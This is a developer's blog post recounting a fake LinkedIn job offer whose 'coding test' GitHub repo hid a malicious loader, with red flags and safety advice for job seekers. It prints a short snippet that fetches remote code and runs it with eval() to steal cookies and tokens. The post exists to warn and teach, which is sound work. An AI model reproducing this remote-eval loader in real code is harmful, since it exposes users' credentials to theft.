How GitHub Repositories Became the Modern-Day Trojan Horses
Introduction
In today's digital world, scams are evolving as quickly as the technologies they target. Everyone remembers the infected .EXE files or the painfully obvious phishing emails. But these days, scams have become far more sophisticated, hiding in other places — like GitHub repositories, where developers are directly targeted. In this post, I'll share my personal experience with a Web3 coding test scam and hopefully help you recognize the warning signs.
The Invitation
Like many remote gigs, it all started with a friendly message in my LinkedIn inbox:
"Hello, Nuri
Happy New Year!
I'm leading an exciting blockchain project with great earning potential. I'd love to discuss how your skills could fit. Reply here to explore further.
Best regards,
Tim"
Tim explained the project in further detail:
"This is a demo version of our ongoing project, showcasing the core features and functionality we're building. In this project, your main tasks will involve adding blockchain networks (such as Ethereum, Binance Smart Chain, and Polygon), integrating a variety of tokens (like ERC-20, BEP-20, and stablecoins such as USDT), and enabling wallet functionalities (supporting wallets like MetaMask, Trust Wallet, and WalletConnect) on the platform.
To be successful in this role, you'll need a strong background in Web3 development, as well as extensive experience with smart contracts, including their design, implementation, and security considerations.
We've already completed several foundational elements of the front-end and back-end systems. Your primary focus will be on strengthening the Web3 integration and advancing the smart contract capabilities. This includes expanding blockchain network support, refining token integrations, and optimizing wallet compatibility to improve user interaction with the platform."
It all seemed professional, so I replied, "Sure, I can take on a part-time gig!" Then Tim moved things along quickly — asking for my hourly rate and when I could start. Once I named a rate, he immediately agreed (red flag). He also mentioned a "technical review," a "coding test," and a "panel review" before signing a contract. Sounded legit — like a normal hiring process, right?
I decided to test his patience by suggesting we wait two weeks. He pushed for an earlier start date (another red flag). Still, I agreed to do the coding test in my free time, and he sent me a private GitHub repo invite. 😏😏
Let’s Go Deeper
Inside GitHub, I found what looked like a standard React project with Web3 utilities (ethers.js) and plenty of files. At first glance, it seemed like a real project: a website, a lot of code, and an outline of features. However, I noticed the GitHub user had only existed for three weeks, had one commit, and the repo had zero contributors — clearly another red flag.
Digging through the code, I stumbled on this snippet:
```javascript
// Snippet as found in the repo: fetches a remote payload and executes it as code.
async function getCookie(params) {
  const res = await axios.get('https://api.npoint.io/--I removed this--');
  eval(res.data.cookie); // whatever the endpoint returns runs with the app's privileges
}
```
Two Major Issues Jumped Out
- It's calling an external API.
- It's using eval().
eval() in JavaScript runs code from a string, which is risky in most situations, especially if the source is shady or unknown.
Curious, I fired up Postman to see what the endpoint returned. It was an obfuscated JSON object containing even more JavaScript code that could:
- Steal cookies and session tokens
- Access browser storage (e.g., localStorage)
- Make unauthorized API calls
- Forward stolen data to the scammers' own server
This wasn't a normal coding test; it was more like a Trojan horse.
What Made It So Devious
We've probably all heard of the "Nigerian prince" email scams, but this felt different. Why?
- Hyper-Targeted: They referenced my background, found me on LinkedIn, and tailored their approach.
- Professional Tone: The communication was well-structured, with no glaring mistakes.
After sharing the code, they asked which operating system I use and wanted a call in the middle of the night. We ended up having a late-night meeting (haha, I couldn’t ignore this one). The person on the call spoke with an African/French accent and jumped straight into questions about my experience—no introduction, no pleasantries.
When I said I had over 10 years of coding experience, he asked me to show my screen and share some of my work. I declined and asked him to share his screen instead. 😂 He claimed he couldn't, so I said, "Same here," and then the call suddenly ended.
So, I sent a message to Tim on LinkedIn:
Nuri Vladimir Ensing (1:45 AM):
I could not understand that man.
His English is very bad.
But hey, tell the guy to improve his eval code 🤣
LinkedIn Member (1:47 AM):
You are very unprofessional.
You are a junior developer.
Bye
Then Tim blocked me. And the fun stopped there. 🥲 So I cried… from laughter, lol, and wrote this blog post instead. 😄
Lessons Learned
If you ever come across a job online, always check:
- Research the Company: Search online for the company's name, check LinkedIn profiles, and review any public repositories. A real, established team will have a digital footprint that's easy to find.
- Request a Video Call: Ask for a call with cameras on. Genuine teams are more than happy to meet "face to face" and introduce themselves and their developers.
- Ask About the Team: Find out who the other devs are, their roles, and how the project is structured. Scammers often struggle with detailed questions about team composition.
- Check Their Repo: When they give access to their repo, check the status of the repo and the contributions made.
- Use a Sandbox or VM: If you still want to test the code, do so in an isolated environment (like Docker or a virtual machine). Never run questionable code on your main system.
- Trust Your Instincts: If the communication feels rushed, unprofessional, or contradictory, don't ignore that gut feeling. A legitimate employer is usually transparent and patient.
With ever-evolving technology — AI, deepfakes, sophisticated chatbots — the line between real and fake blurs more every day. In Web3, where anonymity is common, scammers exploit complexity and hype. They're not going away; they're simply refining their game.
Parting Thoughts
A decade ago, we worried about shady email attachments or strange .exe files. Now, scams can pop up in everyday coding tasks. Be cautious.